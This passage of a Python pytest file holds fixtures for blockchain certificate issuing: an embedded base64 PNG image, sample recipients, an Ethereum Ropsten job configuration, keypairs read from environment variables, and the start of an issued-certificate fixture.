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" class="sc-jzJRlG bvIClq" style="width: 179px; height: 28px;" width="179" height="28" /></div>',
})
@pytest.fixture
def three_recipients() -> List:
    """Yield three recipient records, each with a name, identity (email),
    public key, and an (initially empty) ``displayHtml`` additional field."""
    people = [
        ("Phaws", "phaws@mail.com", "ecdsa-koblitz-pubkey:123ghj123ghj123"),
        ("John", "jack@mail.com", "-"),
        ("Ben", "ben@mail.com", "-"),
    ]
    yield [
        AttrDict({
            "name": name,
            "identity": identity,
            "pubkey": pubkey,
            "additional_fields": OrderedDict(displayHtml=""),
        })
        for name, identity, pubkey in people
    ]
@pytest.fixture
def job() -> Dict:
    """Yield the base job configuration targeting the ethereum_ropsten network."""
    config = {
        "blockchain": "ethereum_ropsten",
        "gas_price": 20000000000,
        # Less than this gas limit won't work!
        "gas_limit": 25000,
    }
    yield AttrDict(config)
@pytest.fixture
def job_custom_keypair_1(job) -> Dict:
    """Yield the base job config extended with the "_2" Ethereum keypair
    read from the environment, plus its creation timestamp."""
    keypair = {
        "eth_public_key": os.environ.get('ETH_PUBLIC_KEY_2'),
        "eth_private_key": os.environ.get('ETH_PRIVATE_KEY_2'),
        "eth_key_created_at": '2019-02-26T23:37:07.464654+00:00',
    }
    yield AttrDict({**job, **keypair})
@pytest.fixture
def job_custom_keypair_2(job) -> Dict:
    """Yield the base job config extended with the "_3" Ethereum keypair
    read from the environment, plus its creation timestamp."""
    keypair = {
        "eth_public_key": os.environ.get('ETH_PUBLIC_KEY_3'),
        "eth_private_key": os.environ.get('ETH_PRIVATE_KEY_3'),
        "eth_key_created_at": '2019-01-26T23:37:07.464654+00:00',
    }
    yield AttrDict({**job, **keypair})
@pytest.fixture
def issued_cert() -> Dict:
yield {'@context': ['https://w3id.org/openbadges/v2', 'https://w3id.org/blockcerts/v2',
{'displayHtml': {'@id': 'schema:description'}}],
'badge': {'criteria': {'narrative': 'Candidates are tested on...'},
'description': 'Operators know how to run the plant.',
'id': 'urn:uuid:123Y-UI12-3YUI',
